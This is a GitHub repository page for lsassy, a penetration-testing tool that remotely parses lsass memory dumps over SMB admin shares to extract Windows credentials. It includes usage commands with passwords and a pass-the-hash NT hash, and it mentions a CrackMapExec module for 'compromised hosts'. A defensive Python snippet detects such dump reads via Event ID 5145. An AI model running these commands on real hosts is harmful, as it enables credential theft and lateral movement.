Remotely parse lsass dumps and extract credentials
Latest commit cc464be Dec 4, 2019
Type Name Latest commit message Commit time
assets Rename picture file Dec 4, 2019
cme Add credentials to CME db Dec 4, 2019
lsassy Distinguish plaintext and hash authentication Dec 4, 2019
.gitignore Add gitignore Dec 3, 2019
LICENSE First commit Dec 3, 2019
Makefile First commit Dec 3, 2019
README.md Distinguish plaintext and hash authentication Dec 4, 2019
requirements.txt First commit Dec 3, 2019
setup.py New version Dec 4, 2019

README.md

lsassy

Python library to remotely parse an lsass dump and extract credentials. It uses the impacket project to remotely read the necessary bytes of the lsass dump and pypykatz to extract the credentials.

Requirements

Basic Usage

lsassy [<domain>/]<user>[:<password>]@<target>:/share_name/path/to/lsass.dmp [--hashes [LM:]NT]

CrackMapExec module

I wrote a CrackMapExec module that uses lsassy to extract credentials on compromised hosts.

The CrackMapExec module is in the cme folder: CME Module

Examples

lsassy

lsassy ADSEC.LOCAL/jsnow:Winter_is_coming_\!@dc01.adsec.local:/C$/Windows/Temp/lsass.dmp

lsassy Administrateur:952c28bd2fd728898411b301475009b7@desktop01.adsec.local:/ADMIN$/lsass.dmp
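
From the defender's side, the two commands above read a dump file over the C$ and ADMIN$ shares, which Windows records as Event ID 5145 when the "Audit Detailed File Share" policy is enabled. The following is an added example, not part of lsassy: it assumes 5145 records exported as dictionaries, and the sample records and the `.dmp` name filter are constructed for illustration.

```python
# Flag Event ID 5145 records that show a .dmp file on an administrative
# share being opened for reading from the network.

READ_DATA = 0x1  # FILE_READ_DATA bit in the 5145 AccessMask field


def is_admin_share(share_name: str) -> bool:
    # 5145 reports shares as \\*\C$, \\*\ADMIN$, ...; admin shares end in "$"
    leaf = share_name.rsplit("\\", 1)[-1].upper()
    return leaf.endswith("$") and leaf != "IPC$"


def flag_dump_reads(events):
    """Return the 5145 events that read a *.dmp file over an admin share."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 5145:
            continue
        target = ev.get("RelativeTargetName", "").lower()
        mask = int(ev.get("AccessMask", "0x0"), 16)
        if (is_admin_share(ev.get("ShareName", ""))
                and target.endswith(".dmp")
                and mask & READ_DATA):
            hits.append(ev)
    return hits


SAMPLE_EVENTS = [  # constructed records, shaped like exported 5145 EventData
    {"EventID": 5145, "SubjectUserName": "jsnow", "IpAddress": "192.0.2.10",
     "ShareName": r"\\*\C$", "RelativeTargetName": r"Windows\Temp\lsass.dmp",
     "AccessMask": "0x120089"},
    {"EventID": 5145, "SubjectUserName": "Administrateur", "IpAddress": "192.0.2.10",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "lsass.dmp",
     "AccessMask": "0x1"},
    {"EventID": 5145, "SubjectUserName": "backup", "IpAddress": "192.0.2.20",
     "ShareName": r"\\*\C$", "RelativeTargetName": r"Users\Public\report.docx",
     "AccessMask": "0x120089"},
    {"EventID": 5145, "SubjectUserName": "jsnow", "IpAddress": "192.0.2.10",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "srvsvc",
     "AccessMask": "0x12019f"},
    {"EventID": 5145, "SubjectUserName": "svc", "IpAddress": "192.0.2.30",
     "ShareName": r"\\*\C$", "RelativeTargetName": r"Windows\Temp\app.dmp",
     "AccessMask": "0x100"},  # no read bit set, so not flagged
]

if __name__ == "__main__":
    for ev in flag_dump_reads(SAMPLE_EVENTS):
        print(ev["IpAddress"], ev["SubjectUserName"], ev["RelativeTargetName"])
```

The file-name filter is only a heuristic: a dump saved under a different extension is not matched, so the admin-share and source-address fields are worth reviewing on their own.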

CME Module

Example image

Installing

From pip

python3.7 -m pip install lsassy

From sources

python3.7 setup.py install

Acknowledgments

  • Impacket
  • SkelSec for Pypykatz, but also for his patience and help
  • mpgn for his help and ideas